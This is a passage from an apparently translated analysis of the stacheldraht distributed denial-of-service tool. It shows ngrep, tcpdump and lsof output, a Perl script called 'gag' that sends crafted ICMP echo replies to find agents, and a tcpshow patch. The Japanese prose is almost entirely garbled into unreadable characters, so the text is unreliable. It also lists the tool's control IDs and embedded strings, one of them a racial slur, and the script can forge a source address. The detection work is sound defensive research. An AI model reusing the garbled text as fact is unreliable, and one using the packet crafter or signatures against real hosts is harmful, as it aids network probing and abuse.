�܂��AID�t�B�[���h��669�A�f�[�^�t�B�[���h�Ɂusicken\n�v�Ƃ�������������ICMP ECHO_REPLY�p�P�b�g�𑗂��čs��ID�e�X�g�����s����R�[�h������B���̃R�[�h�̓n���h���[��ICMP ECHO_REPLY�p�P�b�g��ID�t�B�[���h��668�����đ������ꍇ�ɓ��삷��B�ugag�v�Ƃ����v���O�����iAppendixA�Q�Ɓj���g���� stacheldraht�G�[�W�F���g��Ȗ��ɒ��ׂ��邾�낤�B�ȉ��͓������ʁiAppendixC�̂悤�Ƀp�b�`���Ă��ꂽ tcpdump��tcpshow�ɂ���Č������́j�F
------------------------------------------------------------------------------
# ngrep -x "*" icmp
interface: eth0 (0.0.0.0/0.0.0.0)
filter: ip and ( icmp )
Kernel filter, protocol ALL, raw packet socket
match: *
#
I 10.0.0.2 -> 198.162.0.1 0:0
02 9c 00 00 67 65 73 75 6e 64 68 65 69 74 21 ....gesundheit!
#
I 198.162.0.1 -> 10.0.0.2 0:0
02 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 73 69 63 6b 65 6e 0a 00 ........sicken..
[ 61 lines of zeroes deleted ]
00 00 00 00 00 00 00 00 00 00 00 00 ............
------------------------------------------------------------------------------
�X�N���v�g�ugag�v�͂����������Ɏg���B�܂��ŏ��ɁA�������ȃV�X�e����S�ă��X�g�A�b�v����i�Ⴆ�Anmap��OS�̃X�L���������s���A Solaris��Linux�V�X�e����S�Č��o���邩�A���邢�͂����P�ɑS�Ẵl�b�g���[�N���X�L�������ē��삵�Ă���i�R���s���[�^�́jIP�A�h���X�� ���o����j�B���ƂŎg�����߂ɁA�\�������肻���ȉ��������ׂăL���v�`���[���邽��tcpdump���N�����Ă����B������gag���N�����AIP�A�h���X �̃��X�g���`�F�b�N������B
------------------------------------------------------------------------------
# tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
# ./gag -v iplist
sending packet [668/"gesundheit!"] to 192.168.0.1
sending packet [668/"gesundheit!"] to 192.168.0.30
sending packet [668/"gesundheit!"] to 192.168.1.2
sending packet [668/"gesundheit!"] to 192.168.1.5
sending packet [668/"gesundheit!"] to 192.168.2.10
sending packet [668/"gesundheit!"] to 192.168.3.6
. . .
------------------------------------------------------------------------------
ID��699�ł���ICMP ECHO_REPLY�p�P�b�g��Ԃ��Ă���V�X�e���̃��X�g�����Ă݂悤�F
------------------------------------------------------------------------------
# tcpdump -r stach.dump
tcpdump: Filtering in user process
15:27:57.520094 192.168.0.1 > 10.0.0.1: icmp: echo reply (DF)
15:28:01.984660 192.168.2.10 > 10.0.0.1: icmp: echo reply (DF)
------------------------------------------------------------------------------
����ɕ�����usicken\n�v���܂ރp�P�b�g�����Ă݂悤�F
------------------------------------------------------------------------------
# tcpshow < stach.dump | egrep "Source IP|sicken"
tcpdump: Filtering in user process
Source IP Address: 198.162.0.1
....................sicken
Source IP Address: 192.168.2.10
....................sicken
------------------------------------------------------------------------------
�i�����ƋC�̗���������������B���Ƃ����Ղŋ@�\���ڂ�libnet���g����C�v���O�����������Ă݂�Ƃ��iAppendixB�� �Q�Ƃ̂��Ɓj�B�ł�Y2K�C�u�܂łɋC�������قǂ̎��Ԃ͎c����Ă��Ȃ��B�������B���lj���d���������������B�ł�����Ă݂���R�̐����Ă�G�[�W�F�� �g�����������j
������uskillz�v�uspoofworks�v�usicken�v�uniggahbitch�v�uficken�v�i�݂��ICMP�̃f�[�^�Z�O�����g �ɓ����Ă�����̂����j�͈Í�������Ă��Ȃ��̂ŁAICMP ECHO_REPLY�̃f�[�^�����ɓ����Ă���̂�������BID�̒l666�A667�A668�A669�A1000����������L�̕��@�Ńp�P�b�g���F�Ɏg�� ���B
stacheldraht�n���h���[�́A�q�v���Z�X�ɂ���ăR�}���h���n���h�����A����ICMP�p�P�b�g��listen�����邪�Alsof�������� ����V�X�e���ł͂���ȕ��Ɍ�����F
------------------------------------------------------------------------------
# lsof -c mserv
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
mserv 1072 root cwd DIR 3,3 2048 40961 /tmp/...
mserv 1072 root rtd DIR 3,3 1024 2 /
mserv 1072 root txt REG 3,3 50506 41421 /tmp/.../mserv
mserv 1072 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so
mserv 1072 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so
mserv 1072 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so
mserv 1072 root 0u CHR 136,4 6 /dev/pts/4
mserv 1072 root 1u CHR 136,4 6 /dev/pts/4
mserv 1072 root 2u CHR 136,4 6 /dev/pts/4
mserv 1072 root 3u sock 0,0 2143 can't identify protocol
mserv 1073 root cwd DIR 3,3 2048 40961 /tmp/...
mserv 1073 root rtd DIR 3,3 1024 2 /
mserv 1073 root txt REG 3,3 50506 41421 /tmp/.../mserv
mserv 1073 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so
mserv 1073 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so
mserv 1073 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so
mserv 1073 root 0u CHR 136,4 6 /dev/pts/4
mserv 1073 root 1u CHR 136,4 6 /dev/pts/4
mserv 1073 root 2u CHR 136,4 6 /dev/pts/4
mserv 1073 root 3u inet 2144 TCP *:16660 (LISTEN)
mserv 1088 root cwd DIR 3,3 2048 40961 /tmp/...
mserv 1088 root rtd DIR 3,3 1024 2 /
mserv 1088 root txt REG 3,3 50506 41421 /tmp/.../mserv
mserv 1088 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so
mserv 1088 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so
mserv 1088 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so
mserv 1088 root 0u CHR 136,4 6 /dev/pts/4
mserv 1088 root 1u CHR 136,4 6 /dev/pts/4
mserv 1088 root 2u CHR 136,4 6 /dev/pts/4
mserv 1088 root 3r FIFO 0,0 2227 pipe
mserv 1088 root 5w FIFO 0,0 2227 pipe
mserv 1091 root cwd DIR 3,3 2048 40961 /tmp/...
mserv 1091 root rtd DIR 3,3 1024 2 /
mserv 1091 root txt REG 3,3 50506 41421 /tmp/.../mserv
mserv 1091 root mem REG 3,3 342206 30722 /lib/ld-2.1.1.so
mserv 1091 root mem REG 3,3 63878 30731 /lib/libcrypt-2.1.1.so
mserv 1091 root mem REG 3,3 4016683 30729 /lib/libc-2.1.1.so
mserv 1091 root 0u CHR 136,4 6 /dev/pts/4
mserv 1091 root 1u CHR 136,4 6 /dev/pts/4
mserv 1091 root 2u CHR 136,4 6 /dev/pts/4
mserv 1091 root 3r FIFO 0,0 2240 pipe
mserv 1091 root 4u inet 2215 TCP
192.168.0.1:16660->10.0.0.1:1029 (ESTABLISHED)
mserv 1091 root 5w FIFO 0,0 2240 pipe
------------------------------------------------------------------------------
�G�[�W�F���g���g�p���͎q�v���Z�X�������A����ȕ��Ɍ��邱�Ƃ��ł���F
------------------------------------------------------------------------------
# lsof -c ttymon
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ttymon 437 root cwd DIR 3,1 1024 37208 /usr/lib/libx/...
ttymon 437 root rtd DIR 3,1 1024 2 /
ttymon 437 root txt REG 3,1 324436 37112 /usr/lib/libx/.../ttymon
ttymon 437 root mem REG 3,1 243964 29140 /lib/libnss_files-2.1.1.so
ttymon 437 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
ttymon 437 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ttymon 437 root 3u sock 0,0 779 can't identify protocol
ttymon 449 root cwd DIR 3,1 1024 37208 /usr/lib/libx/...
ttymon 449 root rtd DIR 3,1 1024 2 /
ttymon 449 root txt REG 3,1 324436 37112 /usr/lib/libx/.../ttymon
ttymon 449 root 0u inet 811 TCP *:32222 (LISTEN)
ttymon 449 root 3u sock 0,0 779 can't identify protocol
------------------------------------------------------------------------------
�h��
�v���O�������ʐM�̂��߂�ICMP ECHO_REPLY�p�P�b�g���g���̂ŁAICMP��M������قƂ�ǂ̃C���^�[�l�b�g�v���O�������Ȃ�����h�䂷�邱�Ƃ́i�s�\�ł͂Ȃ��ɂ���j ��ϓ���BPhrack��LOKI�L���ɂ͂�������F
���̃g���t�B�b�N������ł��Ȃ��ꍇ�́A�����ICMP_ECHO��ICMP_ECHOREPLY�p�P�b�g���A�Ⴆ��ping�̂悤�ȃv���O���� ���g���āu���ʂɁv���삷��Ƃ��Ƃ̈Ⴂ���A�ǂ��ώ@����K�v�����邾�낤�B����͊ȒP�ł͂Ȃ��B���ɑ�K�͂ȃl�b�g���[�N�̏ꍇ�́B�i�ڍׂɂ��Ă͏� �LLOKI�L�����Q�Ƃ̂��Ɓj
�^�̖h��@�Ƃ́A�m���ɑS�ẴV�X�e���ɂ����ƃZ�L�����e�B�p�b�`���������ĂāA�m���ɕs�v�ȃT�[�r�X���N�����Ă��Ȃ��āA�L�\�ȃV�X�e���Ǘ��� �����Ȃ��̃l�b�g���[�N�̑S�Ă�UNIX�V�X�e���𑖂点�āA������m���Ƀ��j�^�[���Ă��邱�Ƃł���B�i�����{���ɂ���Ȃ��Ƃ��ł����瑧��ۂނ��� �ˁj
��_
�C���������Ă��Ȃ���A�O�q�̂Ƃ���stacheldraht�̃N���C�A���g�^�n���h���[�^�G�[�W�F���g������̕�����ߍ��܂�Ă���̂ŁA ���肪�\�ł���ƌ�����B
.distro�R�}���h��Berkeley��rcp�R�}���h���G�[�W�F���g�̃A�b�v�f�[�g�R�s�[�����������Ă��邽�߂Ɏg���B�Ƃ������Ƃ̓l�b�g ���[�N��̕����V�X�e������A�l�b�g���[�N�O���̒P���IP�A�h���X�ւ�rcp�i514/tcp�j�����j�^�[����A�悢�g���K�[�ɂȂ邾�낤�B�i���̌` ����rcp�̎g�p�ɂ�anonymous�M���W���K�v�ł���A�ӂ������/.rhosts�t�@�C���̒��g��+ +�Ƃ��Ď������邪�A�������������m�͂܂��A�؋��ۑS�̂��߂ɃI�[�i�[�ɃR���^�N�g����ԂɁA���̃A�J�E���g�̓��e���������ɃA�[�J�C�u���ł���A�Ƃ��� ���Ƃł�����j
����IP�����e�X�g�ł͐ÓI�ȃ\�[�X�A�h���X3.3.3.3���g����B�O�����ɔ��M����鉞���v��ICMP_ECHOREPLY�p�P�b�g�̃\�[�X �A�h���X�ɂ��̃A�h���X�������̂����邱�ƁB�i����RFC2267�X�^�C���̏o���ł̃t�B���^�����O�����Ă���̂Ȃ�A�O�ڂ��郋�[�^�[�̓����́A�� �邢�͊e�T�u�l�b�g�̂ǂ������炱�������p�P�b�g�����M�����̂��ώ@����K�v������B�C�[�T�l�b�g�̃X�C�b�`�����[�J���̃T�u�l�b�g�Ŋώ@����̂����� �ɂނ��������Ă���̂ŁA�O�ڐ��������ɐN�����m�V�X�e����u�����Ƃ��A�S�̂̃l�b�g���[�N�ւ̊Ď����s���ŗǂ̕��@�Ƃ����邾�낤�j
stacheldraht�͂��̋@�\�̂����̂�������ICMP_ECHOREPLY�p�P�b�g���g�p���Ă��āA���p����TCP�̃R�l�N�V������ �f�[�^�X�g���[����Blowfish�Í������g���Ă���̂ŁAstacheldraht�����s�ƓI�ɕߑ�����͓̂�����AICMP_ECHOREPLY �p�P�b�g�Ƃ����̂͂��������قƂ�ǂ�firewall��ʂ�̂��������킯�ł���Bngrep�̂悤�ȃv���O������ICMP�p�P�b�g���������Ȃ����A�� ����Ƃ����Ă���ICMP�p�P�b�g�̃f�[�^������������g���Ċώ@�ł���Ƃ����킯�ł͂Ȃ��itcpshow�Ɏg����AppendixC�� �p�b�`�Ƃ��ATFN���͂Ŏg����sniffit�ւ̃p�b�`���g���ꍇ�ȊO�́j�B
stacheldraht��ICMP�p�P�b�g��F���Ȃ����A�܂�ICMP�p�P�b�g�̒��ɖ��ߍ��܂ꂽ��������Í�������Ă��Ȃ��B
�����R�}���h�̒l���f�t�H���g����ς����Ă��Ȃ���A�G�[�W�F���g���яオ�点�邽�߂ɂ͂������P�̃p�P�b�g�������K�v�ɂȂ邾�낤�B�� ��͈ȉ��̂ǂ��炩���F
a).ID�t�B�[���h�̒l668��ICMP_ECHOREPLY�p�P�b�g�𑗂�AID�t�B�[���h�̒l669�ł��f�[�^�t�H�[���h�ɕ����� �usticken\n�v������ICMP_ECHOREPLY�p�P�b�g���߂��Ă��邩�ǂ����ώ@����B�������́A
b).�\�[�X�A�h���X3.3.3.3�i������ID666�Ńf�[�^�t�B�[���h�ɂ́uskillz�v�j��ICMP_ECHOREPLY�p�P�b�g�𑗂�A ID�t�B�[���h�̒l1000�ł��f�[�^�t�H�[���h�ɕ�����uspoofworks�v������ICMP_ECHOREPLY�p�P�b�g���߂��Ă��邩�ǂ����� �@����B
�iNet::RawIP���g��gag�Ƃ�������Perl�X�N���v�g���A�O�q�̂Ƃ��肻�̖ړI����萋���邽�߂ɊJ������Ă���BAppendixA�Q �Ɓj
���Ȃ�_���I�i���̒i�K
�P�O�����߁A�ŏ��ɂ킽����trinoo�̃\�[�X�R�[�h�͂��n�߂āA���̒����TFN�̃o�C�i������肵���Ƃ��́A���ӒʐM�`���l���̈Í����� ��K�̓l�b�g���[�N�ł̎����A�b�v�f�[�g�@�\������ł��낤���Ƃ͂킽���ɂ͎����������B�P�P��CERT�̃��[�N�V���b�v�ő��̐l�X�Ƌc�_�������� �ŁA�i�A���_�[�O���E���h�ł������Ɠ����l���������Ă���ɈႢ�Ȃ����j�����̐V�@�\�̃A�C�f�B�A��������ł����B
stacheldraht�̃R�[�h�������āA�܂��\�[�X�R�[�h�������[�X����Ă��Ȃ��T�[�r�X�s�\�U���c�[���i���N�g�[�^���S��̈قȂ����n���h ���[�^�G�[�W�F���g�^��܂�DoS�c�[�����������Ă���j�Ȃǂ����Ă݂�ƁA�����������c�[���̐i���ɂ��Ă̂킽���̉���͂��Ԃ��Ă���Ǝv ���B���Ƃ��R�[�h�ɂ͂��܂��ɕ��͂��Ă��Ȃ�������������Ǝc���Ă��āA�܂��o�O���c����Ă���Ƃ��Ă��i�Ⴆ�P�Q���Q�O���ɔ������ꂽ�C���X�g���[ �V�����́A�G�[�W�F���g���ċN������cron�̃G���g���[�������Ă����I�j
�V�N�ɉ����N����̂��A�����҂Ă܂���B
Appendix A - Perl script "gag" to detect stacheldraht
agents
------------------------------------------------------------
------------------------------- cut here -----------------------------------
#!/usr/bin/perl
#
# gag v. 1.0
# By Dave Dittrich <[email protected]>
#
# Send an ICMP_ECHOREPLY packet with ID of 668 to a stacheldraht
# agent, causing it to reply to the sending host with an
# ICMP_ECHOREPLY packet with an ID of 669 and the string "sicken\n"
# in the data field of the packet. Watch for this with tcpdump,
# ngrep, sniffit, etc., e.g.:
#
# # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
# # tcpshow < stach.dump
# or
# # ngrep -x '*' 'icmp[4:2] = 669'
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./gag [options] iplist
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek <[email protected]>)
require 'getopts.pl';
use Net::RawIP;
require 'netinet/in.ph';
$a = new Net::RawIP({icmp => {}});
chop($hostname = `hostname`);
Getopts('a:c:f:i:vh');
die "usage: $0 [options] iplist\
\t-a arg\t\tSend command argument 'arg' (default \"gesundheit!\")\
\t-c val\t\tSend command value 'val' (default 668 - ID_TEST)\
\t-f from_host\t\t(default:$hostname)\
\t-i interface \t\tSet sending interface (default:eth0)\
\t-v\t\t\tVerbose\
\t-h This help\n" unless ( !$opt_h );
# set default values
$opt_i = ($opt_i) ? $opt_i : "eth0";
$opt_a = ($opt_a) ? $opt_a : "gesundheit!";
$opt_c = ($opt_c) ? $opt_c : "668";
# choose network card
if($opt_e) {
$a->ethnew($opt_i, dest => $opt_e);
} else {
$a->ethnew($opt_i);
}
$s_host = ($opt_f) ? $opt_f : $hostname;
if ($ARGV[0]) {
open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'";
while (<I>) {
chop;
push(@list,$_);
}
close(I);
}
# Put value in network byte order (couldn't get htons() in
# "netinet/in.ph" to work. Go figure.)
$id = unpack("S", pack("n", $opt_c));
foreach $d_host (@list) {
$a->set({ip => {saddr => $s_host, daddr => $d_host},
icmp => {type => 0, id => $id, data => $opt_a}
});
print "sending packet [$opt_c/\"$opt_a\"] to $d_host\n" if $opt_v;
$a->send;
}
exit(0);
------------------------------- cut here -----------------------------------
Appendix B - References
-----------------------
TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens
and Gary
R. Wright., Addison-Wesley.
The DoS Project's "trinoo" distributed denial of
service attack tool
http://staff.washington.edu/dittrich/misc/trinoo.analysis
The "Tribe Flood Network" distributed denial of service
attack tool
http://staff.washington.edu/dittrich/misc/tfn.analysis
CERT Distributed System Intruder Tools Workshop report
http://www.cert.org/reports/dsit_workshop.pdf
CERT Advisory CA-99-17 Denial-of-Service Tools
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
Distributed denial of service attack tools at Packet Storm
Security
http://packetstorm.securify.com/distributed/
ngrep:
http://www.packetfactory.net/ngrep/
tcpdump:
ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
tcpshow:
http://packetstorm.securify.com/linux/trinux/src/tcpshow.c
sniffit:
http://sniffit.rug.ac.be/sniffit/sniffit.html
Net::RawIP:
http://quake.skif.net/RawIP
loki client/server:
Phrack Magazine, Volume Seven, Issue Forty-Nine,
File 06 of 16, [ Project Loki ]
http://www.phrack.com/search.phtml?view&article=p49-6
Phrack Magazine Volume 7, Issue 51 September 01, 1997,
article 06 of 17 [ L O K I 2 (the implementation) ]
http://www.phrack.com/search.phtml?view&article=p51-6
libnet:
http://www.packetfactory.net/libnet
----------------------------------------------------------------------------
Appendix C: Patches to tcpshow 1.0 to display ICMP ECHO
id/seq
----------------------------------------------------------------------
diff -c tcpshow/tcpshow.c tcpshow.orig/tcpshow.c
*** tcpshow/tcpshow.c Mon Dec 27 16:21:54 1999
--- tcpshow.orig/tcpshow.c Thu Oct 21 14:12:19 1999
***************
*** 1081,1088 ****
uint2 nskipped;
uint1 type;
char *why;
- uint2 echo_id;
- uint2 echo_seq;
type = getbyte(&pkt); nskipped = sizeof(type);
--- 1081,1086 ----
***************
*** 1093,1103 ****
/* Must calculate it from the size of the IP datagram - the IP header. */
datalen -= ICMPHDRLEN;
- if (type == ECHO_REQ || type == ECHO_REPLY) {
- echo_id = getword(&pkt); nskipped += sizeof(cksum);
- echo_seq = getword(&pkt); nskipped += sizeof(cksum);
- }
-
why = icmpcode(type, code);
if (dataflag) {
printf(
--- 1091,1096 ----
***************
*** 1120,1129 ****
icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: ""
);
printf("\tChecksum:\t\t\t0x%04X\n", cksum);
- if (type == ECHO_REQ || type == ECHO_REPLY) {
- printf("\tId:\t\t\t\t0x%04X (%d)\n", echo_id, echo_id);
- printf("\tSequence:\t\t\t0x%04X (%d)\n", ntohs(echo_seq), ntohs(echo_seq));
- }
}
return pkt;
--- 1113,1118 ----
***************
*** 1194,1200 ****
printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
! printf("\tIdentification:\t\t\t0x%04X (%d)\n", id, id);
printf(
"\tFlags:\t\t\t\tMF=%s DF=%s\n",
(flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
--- 1183,1189 ----
printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
! printf("\tIdentification:\t\t\t0x%04X\n", id);
printf(
"\tFlags:\t\t\t\tMF=%s DF=%s\n",
(flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
----------------------------------------------------------------------